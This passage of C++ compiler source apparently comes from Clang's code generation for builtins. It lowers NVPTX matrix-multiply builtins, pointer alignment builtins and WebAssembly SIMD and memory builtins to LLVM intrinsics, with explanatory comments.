// Intrinsic::nvvm_wmma_m16n16k16_mma_sync<layout A,B><DType><CType><Satf>
case NVPTX::BI__hmma_m16n16k16_mma_f16f16:
case NVPTX::BI__hmma_m16n16k16_mma_f32f16:
case NVPTX::BI__hmma_m16n16k16_mma_f32f32:
case NVPTX::BI__hmma_m16n16k16_mma_f16f32:
case NVPTX::BI__hmma_m32n8k16_mma_f16f16:
case NVPTX::BI__hmma_m32n8k16_mma_f32f16:
case NVPTX::BI__hmma_m32n8k16_mma_f32f32:
case NVPTX::BI__hmma_m32n8k16_mma_f16f32:
case NVPTX::BI__hmma_m8n32k16_mma_f16f16:
case NVPTX::BI__hmma_m8n32k16_mma_f32f16:
case NVPTX::BI__hmma_m8n32k16_mma_f32f32:
case NVPTX::BI__hmma_m8n32k16_mma_f16f32:
case NVPTX::BI__imma_m16n16k16_mma_s8:
case NVPTX::BI__imma_m16n16k16_mma_u8:
case NVPTX::BI__imma_m32n8k16_mma_s8:
case NVPTX::BI__imma_m32n8k16_mma_u8:
case NVPTX::BI__imma_m8n32k16_mma_s8:
case NVPTX::BI__imma_m8n32k16_mma_u8:
case NVPTX::BI__imma_m8n8k32_mma_s4:
case NVPTX::BI__imma_m8n8k32_mma_u4:
case NVPTX::BI__bmma_m8n8k128_mma_xor_popc_b1:
case NVPTX::BI__bmma_m8n8k128_mma_and_popc_b1:
case NVPTX::BI__dmma_m8n8k4_mma_f64:
case NVPTX::BI__mma_bf16_m16n16k16_mma_f32:
case NVPTX::BI__mma_bf16_m8n32k16_mma_f32:
case NVPTX::BI__mma_bf16_m32n8k16_mma_f32:
case NVPTX::BI__mma_tf32_m16n16k8_mma_f32: {
Address Dst = EmitPointerWithAlignment(E->getArg(0));
Address SrcA = EmitPointerWithAlignment(E->getArg(1));
Address SrcB = EmitPointerWithAlignment(E->getArg(2));
Address SrcC = EmitPointerWithAlignment(E->getArg(3));
Optional<llvm::APSInt> LayoutArg =
E->getArg(4)->getIntegerConstantExpr(getContext());
if (!LayoutArg)
return nullptr;
int Layout = LayoutArg->getSExtValue();
if (Layout < 0 || Layout > 3)
return nullptr;
llvm::APSInt SatfArg;
if (BuiltinID == NVPTX::BI__bmma_m8n8k128_mma_xor_popc_b1 ||
BuiltinID == NVPTX::BI__bmma_m8n8k128_mma_and_popc_b1)
SatfArg = 0; // .b1 does not have satf argument.
else if (Optional<llvm::APSInt> OptSatfArg =
E->getArg(5)->getIntegerConstantExpr(getContext()))
SatfArg = *OptSatfArg;
else
return nullptr;
bool Satf = SatfArg.getSExtValue();
NVPTXMmaInfo MI = getNVPTXMmaInfo(BuiltinID);
unsigned IID = MI.getMMAIntrinsic(Layout, Satf);
if (IID == 0) // Unsupported combination of Layout/Satf.
return nullptr;
SmallVector<Value *, 24> Values;
Function *Intrinsic = CGM.getIntrinsic(IID);
llvm::Type *AType = Intrinsic->getFunctionType()->getParamType(0);
// Load A
for (unsigned i = 0; i < MI.NumEltsA; ++i) {
Value *V = Builder.CreateAlignedLoad(
SrcA.getElementType(),
Builder.CreateGEP(SrcA.getElementType(), SrcA.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, AType));
}
// Load B
llvm::Type *BType = Intrinsic->getFunctionType()->getParamType(MI.NumEltsA);
for (unsigned i = 0; i < MI.NumEltsB; ++i) {
Value *V = Builder.CreateAlignedLoad(
SrcB.getElementType(),
Builder.CreateGEP(SrcB.getElementType(), SrcB.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, BType));
}
// Load C
llvm::Type *CType =
Intrinsic->getFunctionType()->getParamType(MI.NumEltsA + MI.NumEltsB);
for (unsigned i = 0; i < MI.NumEltsC; ++i) {
Value *V = Builder.CreateAlignedLoad(
SrcC.getElementType(),
Builder.CreateGEP(SrcC.getElementType(), SrcC.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, CType));
}
Value *Result = Builder.CreateCall(Intrinsic, Values);
llvm::Type *DType = Dst.getElementType();
for (unsigned i = 0; i < MI.NumEltsD; ++i)
Builder.CreateAlignedStore(
Builder.CreateBitCast(Builder.CreateExtractValue(Result, i), DType),
Builder.CreateGEP(Dst.getElementType(), Dst.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
return Result;
}
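// Putting the pieces together, a hypothetical D = A * B + C step such as
//   __hmma_m16n16k16_mma_f32f32(d, a, b, c, /*layout=*/0, /*satf=*/0);
// gathers NumEltsA + NumEltsB + NumEltsC fragment elements, issues one
// wmma mma intrinsic selected by (layout, satf), and scatters the NumEltsD
// results back into d. Layout encodes the row/column-major choice for the
// A and B fragments, giving the four combinations checked against 0..3
// above.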
default:
return nullptr;
}
}
namespace {
struct BuiltinAlignArgs {
llvm::Value *Src = nullptr;
llvm::Type *SrcType = nullptr;
llvm::Value *Alignment = nullptr;
llvm::Value *Mask = nullptr;
llvm::IntegerType *IntType = nullptr;
BuiltinAlignArgs(const CallExpr *E, CodeGenFunction &CGF) {
QualType AstType = E->getArg(0)->getType();
if (AstType->isArrayType())
Src = CGF.EmitArrayToPointerDecay(E->getArg(0)).getPointer();
else
Src = CGF.EmitScalarExpr(E->getArg(0));
SrcType = Src->getType();
if (SrcType->isPointerTy()) {
IntType = IntegerType::get(
CGF.getLLVMContext(),
CGF.CGM.getDataLayout().getIndexTypeSizeInBits(SrcType));
} else {
assert(SrcType->isIntegerTy());
IntType = cast<llvm::IntegerType>(SrcType);
}
Alignment = CGF.EmitScalarExpr(E->getArg(1));
Alignment = CGF.Builder.CreateZExtOrTrunc(Alignment, IntType, "alignment");
auto *One = llvm::ConstantInt::get(IntType, 1);
Mask = CGF.Builder.CreateSub(Alignment, One, "mask");
}
};
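// Worked example of the mask computation (alignments are required to be
// powers of two): for Alignment == 16, Mask == 15 == 0b1111, so the low
// four bits of an address select its offset within a 16-byte block.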
} // namespace
/// Generate (x & (y-1)) == 0.
RValue CodeGenFunction::EmitBuiltinIsAligned(const CallExpr *E) {
BuiltinAlignArgs Args(E, *this);
llvm::Value *SrcAddress = Args.Src;
if (Args.SrcType->isPointerTy())
SrcAddress =
Builder.CreateBitOrPointerCast(Args.Src, Args.IntType, "src_addr");
return RValue::get(Builder.CreateICmpEQ(
Builder.CreateAnd(SrcAddress, Args.Mask, "set_bits"),
llvm::Constant::getNullValue(Args.IntType), "is_aligned"));
}
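// A minimal sketch of the IR this emits for __builtin_is_aligned(p, 16),
// with illustrative value names:
//   %src_addr   = ptrtoint i8* %p to i64
//   %set_bits   = and i64 %src_addr, 15
//   %is_aligned = icmp eq i64 %set_bits, 0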
/// Generate (x & ~(y-1)) to align down or ((x+(y-1)) & ~(y-1)) to align up.
/// Note: For pointer types we can avoid ptrtoint/inttoptr pairs by using the
/// llvm.ptrmask intrinsic (with a GEP before in the align_up case).
/// TODO: actually use ptrmask once most optimization passes know about it.
RValue CodeGenFunction::EmitBuiltinAlignTo(const CallExpr *E, bool AlignUp) {
BuiltinAlignArgs Args(E, *this);
llvm::Value *SrcAddr = Args.Src;
if (Args.Src->getType()->isPointerTy())
SrcAddr = Builder.CreatePtrToInt(Args.Src, Args.IntType, "intptr");
llvm::Value *SrcForMask = SrcAddr;
if (AlignUp) {
// When aligning up, first add the mask so that any value with low bits set
// crosses the next alignment boundary; the masking below then rounds down
// to that boundary. Adding the mask (rather than the full alignment)
// ensures that align_up on an already aligned value leaves it unchanged.
SrcForMask = Builder.CreateAdd(SrcForMask, Args.Mask, "over_boundary");
}
// Invert the mask to only clear the lower bits.
llvm::Value *InvertedMask = Builder.CreateNot(Args.Mask, "inverted_mask");
llvm::Value *Result =
Builder.CreateAnd(SrcForMask, InvertedMask, "aligned_result");
if (Args.Src->getType()->isPointerTy()) {
/// TODO: Use ptrmask instead of ptrtoint+gep once it is optimized well.
// Result = Builder.CreateIntrinsic(
// Intrinsic::ptrmask, {Args.SrcType, SrcForMask->getType(), Args.IntType},
// {SrcForMask, InvertedMask}, nullptr, "aligned_result");
Result->setName("aligned_intptr");
llvm::Value *Difference = Builder.CreateSub(Result, SrcAddr, "diff");
// The result must point to the same underlying allocation. This means we
// can use an inbounds GEP to enable better optimization.
Value *Base = EmitCastToVoidPtr(Args.Src);
if (getLangOpts().isSignedOverflowDefined())
Result = Builder.CreateGEP(Int8Ty, Base, Difference, "aligned_result");
else
Result = EmitCheckedInBoundsGEP(Base, Difference,
/*SignedIndices=*/true,
/*isSubtraction=*/!AlignUp,
E->getExprLoc(), "aligned_result");
Result = Builder.CreatePointerCast(Result, Args.SrcType);
// Emit an alignment assumption to ensure that the new alignment is
// propagated to loads/stores, etc.
emitAlignmentAssumption(Result, E, E->getExprLoc(), Args.Alignment);
}
assert(Result->getType() == Args.SrcType);
return RValue::get(Result);
}
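// Worked example for align-up (values illustrative): aligning 0x1003 up to
// 16 computes (0x1003 + 15) & ~15 == 0x1010, while an already aligned
// 0x1010 gives (0x1010 + 15) & ~15 == 0x1010, i.e. it is unchanged.
// Align-down simply skips the add: 0x1003 & ~15 == 0x1000.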
Value *CodeGenFunction::EmitWebAssemblyBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_memory_size: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *I = EmitScalarExpr(E->getArg(0));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_memory_size, ResultType);
return Builder.CreateCall(Callee, I);
}
case WebAssembly::BI__builtin_wasm_memory_grow: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *Args[] = {EmitScalarExpr(E->getArg(0)),
EmitScalarExpr(E->getArg(1))};
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_memory_grow, ResultType);
return Builder.CreateCall(Callee, Args);
}
case WebAssembly::BI__builtin_wasm_tls_size: {
llvm::Type *ResultType = ConvertType(E->getType());
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_tls_size, ResultType);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_tls_align: {
llvm::Type *ResultType = ConvertType(E->getType());
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_tls_align, ResultType);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_tls_base: {
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_tls_base);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_throw: {
Value *Tag = EmitScalarExpr(E->getArg(0));
Value *Obj = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_throw);
return Builder.CreateCall(Callee, {Tag, Obj});
}
case WebAssembly::BI__builtin_wasm_rethrow: {
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_rethrow);
return Builder.CreateCall(Callee);
}
case WebAssembly::BI__builtin_wasm_memory_atomic_wait32: {
Value *Addr = EmitScalarExpr(E->getArg(0));
Value *Expected = EmitScalarExpr(E->getArg(1));
Value *Timeout = EmitScalarExpr(E->getArg(2));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_memory_atomic_wait32);
return Builder.CreateCall(Callee, {Addr, Expected, Timeout});
}
case WebAssembly::BI__builtin_wasm_memory_atomic_wait64: {
Value *Addr = EmitScalarExpr(E->getArg(0));
Value *Expected = EmitScalarExpr(E->getArg(1));
Value *Timeout = EmitScalarExpr(E->getArg(2));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_memory_atomic_wait64);
return Builder.CreateCall(Callee, {Addr, Expected, Timeout});
}
case WebAssembly::BI__builtin_wasm_memory_atomic_notify: {
Value *Addr = EmitScalarExpr(E->getArg(0));
Value *Count = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_memory_atomic_notify);
return Builder.CreateCall(Callee, {Addr, Count});
}
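// Per the wasm threads proposal, the wait builtins above return 0 ("ok"),
// 1 ("not-equal"), or 2 ("timed-out"), and notify returns the number of
// waiters woken; all three map directly onto the matching intrinsics.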
case WebAssembly::BI__builtin_wasm_trunc_s_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_s_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_s_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_s_i64_f64: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_trunc_signed, {ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_trunc_u_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_u_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_u_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_u_i64_f64: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_trunc_unsigned,
{ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i64_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_s_i32x4_f32x4: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee =
CGM.getIntrinsic(Intrinsic::fptosi_sat, {ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i32_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i32_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i64_f32:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i64_f64:
case WebAssembly::BI__builtin_wasm_trunc_saturate_u_i32x4_f32x4: {
Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Type *ResT = ConvertType(E->getType());
Function *Callee =
CGM.getIntrinsic(Intrinsic::fptoui_sat, {ResT, Src->getType()});
return Builder.CreateCall(Callee, {Src});
}
case WebAssembly::BI__builtin_wasm_min_f32:
case WebAssembly::BI__builtin_wasm_min_f64:
case WebAssembly::BI__builtin_wasm_min_f32x4:
case WebAssembly::BI__builtin_wasm_min_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::minimum, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_max_f32:
case WebAssembly::BI__builtin_wasm_max_f64:
case WebAssembly::BI__builtin_wasm_max_f32x4:
case WebAssembly::BI__builtin_wasm_max_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::maximum, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_pmin_f32x4:
case WebAssembly::BI__builtin_wasm_pmin_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_pmin, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_pmax_f32x4:
case WebAssembly::BI__builtin_wasm_pmax_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_pmax, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_ceil_f32x4:
case WebAssembly::BI__builtin_wasm_floor_f32x4:
case WebAssembly::BI__builtin_wasm_trunc_f32x4:
case WebAssembly::BI__builtin_wasm_nearest_f32x4:
case WebAssembly::BI__builtin_wasm_ceil_f64x2:
case WebAssembly::BI__builtin_wasm_floor_f64x2:
case WebAssembly::BI__builtin_wasm_trunc_f64x2:
case WebAssembly::BI__builtin_wasm_nearest_f64x2: {
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_ceil_f32x4:
case WebAssembly::BI__builtin_wasm_ceil_f64x2:
IntNo = Intrinsic::ceil;
break;
case WebAssembly::BI__builtin_wasm_floor_f32x4:
case WebAssembly::BI__builtin_wasm_floor_f64x2:
IntNo = Intrinsic::floor;
break;
case WebAssembly::BI__builtin_wasm_trunc_f32x4:
case WebAssembly::BI__builtin_wasm_trunc_f64x2:
IntNo = Intrinsic::trunc;
break;
case WebAssembly::BI__builtin_wasm_nearest_f32x4:
case WebAssembly::BI__builtin_wasm_nearest_f64x2:
IntNo = Intrinsic::nearbyint;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Value *Value = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(IntNo, ConvertType(E->getType()));
return Builder.CreateCall(Callee, Value);
}
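// Note that wasm's "nearest" (round to nearest, ties to even) is lowered
// above to llvm.nearbyint, which in the default FP environment also rounds
// to nearest-even, so the semantics line up.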
case WebAssembly::BI__builtin_wasm_swizzle_i8x16: {
Value *Src = EmitScalarExpr(E->getArg(0));
Value *Indices = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_swizzle);
return Builder.CreateCall(Callee, {Src, Indices});
}
case WebAssembly::BI__builtin_wasm_add_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_s_i16x8:
case WebAssembly::BI__builtin_wasm_add_sat_u_i16x8:
case WebAssembly::BI__builtin_wasm_sub_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_s_i16x8:
case WebAssembly::BI__builtin_wasm_sub_sat_u_i16x8: {
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_add_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_s_i16x8:
IntNo = Intrinsic::sadd_sat;
break;
case WebAssembly::BI__builtin_wasm_add_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_add_sat_u_i16x8:
IntNo = Intrinsic::uadd_sat;
break;
case WebAssembly::BI__builtin_wasm_sub_sat_s_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_s_i16x8:
IntNo = Intrinsic::wasm_sub_sat_signed;
break;
case WebAssembly::BI__builtin_wasm_sub_sat_u_i8x16:
case WebAssembly::BI__builtin_wasm_sub_sat_u_i16x8:
IntNo = Intrinsic::wasm_sub_sat_unsigned;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(IntNo, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_abs_i8x16:
case WebAssembly::BI__builtin_wasm_abs_i16x8:
case WebAssembly::BI__builtin_wasm_abs_i32x4:
case WebAssembly::BI__builtin_wasm_abs_i64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Value *Neg = Builder.CreateNeg(Vec, "neg");
Constant *Zero = llvm::Constant::getNullValue(Vec->getType());
Value *ICmp = Builder.CreateICmpSLT(Vec, Zero, "abscond");
return Builder.CreateSelect(ICmp, Neg, Vec, "abs");
}
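// The lowering above open-codes integer abs as select(v < 0, -v, v); for a
// lane holding -5 this yields select(true, 5, -5) == 5. As with scalar
// abs, the most negative value (e.g. -128 in an i8 lane) negates to itself
// and is returned unchanged.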
case WebAssembly::BI__builtin_wasm_min_s_i8x16:
case WebAssembly::BI__builtin_wasm_min_u_i8x16:
case WebAssembly::BI__builtin_wasm_max_s_i8x16:
case WebAssembly::BI__builtin_wasm_max_u_i8x16:
case WebAssembly::BI__builtin_wasm_min_s_i16x8:
case WebAssembly::BI__builtin_wasm_min_u_i16x8:
case WebAssembly::BI__builtin_wasm_max_s_i16x8:
case WebAssembly::BI__builtin_wasm_max_u_i16x8:
case WebAssembly::BI__builtin_wasm_min_s_i32x4:
case WebAssembly::BI__builtin_wasm_min_u_i32x4:
case WebAssembly::BI__builtin_wasm_max_s_i32x4:
case WebAssembly::BI__builtin_wasm_max_u_i32x4: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Value *ICmp;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_min_s_i8x16:
case WebAssembly::BI__builtin_wasm_min_s_i16x8:
case WebAssembly::BI__builtin_wasm_min_s_i32x4:
ICmp = Builder.CreateICmpSLT(LHS, RHS);
break;
case WebAssembly::BI__builtin_wasm_min_u_i8x16:
case WebAssembly::BI__builtin_wasm_min_u_i16x8:
case WebAssembly::BI__builtin_wasm_min_u_i32x4:
ICmp = Builder.CreateICmpULT(LHS, RHS);
break;
case WebAssembly::BI__builtin_wasm_max_s_i8x16:
case WebAssembly::BI__builtin_wasm_max_s_i16x8:
case WebAssembly::BI__builtin_wasm_max_s_i32x4:
ICmp = Builder.CreateICmpSGT(LHS, RHS);
break;
case WebAssembly::BI__builtin_wasm_max_u_i8x16:
case WebAssembly::BI__builtin_wasm_max_u_i16x8:
case WebAssembly::BI__builtin_wasm_max_u_i32x4:
ICmp = Builder.CreateICmpUGT(LHS, RHS);
break;
default:
llvm_unreachable("unexpected builtin ID");
}
return Builder.CreateSelect(ICmp, LHS, RHS);
}
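// The min/max lowering above is likewise a compare plus select; min_s, for
// example, reduces roughly to (names illustrative):
//   %cmp = icmp slt <16 x i8> %lhs, %rhs
//   %min = select <16 x i1> %cmp, <16 x i8> %lhs, <16 x i8> %rhs
// leaving instruction selection to form the corresponding SIMD min/max.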
case WebAssembly::BI__builtin_wasm_avgr_u_i8x16:
case WebAssembly::BI__builtin_wasm_avgr_u_i16x8: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_avgr_unsigned,
ConvertType(E->getType()));
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_q15mulr_sat_s_i16x8: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_q15mulr_sat_signed);
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_s_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_u_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_s_i32x4:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_u_i32x4: {
Value *Vec = EmitScalarExpr(E->getArg(0));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_s_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_s_i32x4:
IntNo = Intrinsic::wasm_extadd_pairwise_signed;
break;
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i8x16_u_i16x8:
case WebAssembly::BI__builtin_wasm_extadd_pairwise_i16x8_u_i32x4:
IntNo = Intrinsic::wasm_extadd_pairwise_unsigned;
break;
default:
llvm_unreachable("unexptected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo, ConvertType(E->getType()));
return Builder.CreateCall(Callee, Vec);
}
case WebAssembly::BI__builtin_wasm_bitselect: {
Value *V1 = EmitScalarExpr(E->getArg(0));
Value *V2 = EmitScalarExpr(E->getArg(1));
Value *C = EmitScalarExpr(E->getArg(2));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_bitselect, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {V1, V2, C});
}
case WebAssembly::BI__builtin_wasm_dot_s_i32x4_i16x8: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_dot);
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_popcnt_i8x16: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee =
CGM.getIntrinsic(Intrinsic::ctpop, ConvertType(E->getType()));
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_any_true_v128:
case WebAssembly::BI__builtin_wasm_all_true_i8x16:
case WebAssembly::BI__builtin_wasm_all_true_i16x8:
case WebAssembly::BI__builtin_wasm_all_true_i32x4:
case WebAssembly::BI__builtin_wasm_all_true_i64x2: {
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_any_true_v128:
IntNo = Intrinsic::wasm_anytrue;
break;
case WebAssembly::BI__builtin_wasm_all_true_i8x16:
case WebAssembly::BI__builtin_wasm_all_true_i16x8:
case WebAssembly::BI__builtin_wasm_all_true_i32x4:
case WebAssembly::BI__builtin_wasm_all_true_i64x2:
IntNo = Intrinsic::wasm_alltrue;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(IntNo, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_bitmask_i8x16:
case WebAssembly::BI__builtin_wasm_bitmask_i16x8:
case WebAssembly::BI__builtin_wasm_bitmask_i32x4:
case WebAssembly::BI__builtin_wasm_bitmask_i64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_bitmask, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_abs_f32x4:
case WebAssembly::BI__builtin_wasm_abs_f64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(Intrinsic::fabs, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_sqrt_f32x4:
case WebAssembly::BI__builtin_wasm_sqrt_f64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
Function *Callee = CGM.getIntrinsic(Intrinsic::sqrt, Vec->getType());
return Builder.CreateCall(Callee, {Vec});
}
case WebAssembly::BI__builtin_wasm_narrow_s_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_u_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_s_i16x8_i32x4:
case WebAssembly::BI__builtin_wasm_narrow_u_i16x8_i32x4: {
Value *Low = EmitScalarExpr(E->getArg(0));
Value *High = EmitScalarExpr(E->getArg(1));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_narrow_s_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_s_i16x8_i32x4:
IntNo = Intrinsic::wasm_narrow_signed;
break;
case WebAssembly::BI__builtin_wasm_narrow_u_i8x16_i16x8:
case WebAssembly::BI__builtin_wasm_narrow_u_i16x8_i32x4:
IntNo = Intrinsic::wasm_narrow_unsigned;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee =
CGM.getIntrinsic(IntNo, {ConvertType(E->getType()), Low->getType()});
return Builder.CreateCall(Callee, {Low, High});
}
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_s_f64x2_i32x4:
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_u_f64x2_i32x4: {
Value *Vec = EmitScalarExpr(E->getArg(0));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_s_f64x2_i32x4:
IntNo = Intrinsic::fptosi_sat;
break;
case WebAssembly::BI__builtin_wasm_trunc_sat_zero_u_f64x2_i32x4:
IntNo = Intrinsic::fptoui_sat;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
llvm::Type *SrcT = Vec->getType();
llvm::Type *TruncT =
SrcT->getWithNewType(llvm::IntegerType::get(getLLVMContext(), 32));
Function *Callee = CGM.getIntrinsic(IntNo, {TruncT, SrcT});
Value *Trunc = Builder.CreateCall(Callee, Vec);
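// The saturating truncation yields a 2-lane i32 vector; shuffling it with a
// zero splat using indices 0..3 concatenates the two vectors, producing the
// i32x4 result with the upper two lanes zeroed, as trunc_sat_zero requires.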
Value *Splat = Builder.CreateVectorSplat(2, Builder.getInt32(0));
Value *ConcatMask =
llvm::ConstantVector::get({Builder.getInt32(0), Builder.getInt32(1),
Builder.getInt32(2), Builder.getInt32(3)});
return Builder.CreateShuffleVector(Trunc, Splat, ConcatMask);
}
case WebAssembly::BI__builtin_wasm_shuffle_i8x16: {
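// Two vector operands followed by 16 immediate lane indices.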
Value *Ops[18];
size_t OpIdx = 0;
Ops[OpIdx++] = EmitScalarExpr(E->getArg(0));
Ops[OpIdx++] = EmitScalarExpr(E->getArg(1));
while (OpIdx < 18) {
Optional<llvm::APSInt> LaneConst =
E->getArg(OpIdx)->getIntegerConstantExpr(getContext());
assert(LaneConst && "Constant arg isn't actually constant?");
Ops[OpIdx++] = llvm::ConstantInt::get(getLLVMContext(), *LaneConst);
}
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_shuffle);
return Builder.CreateCall(Callee, Ops);
}
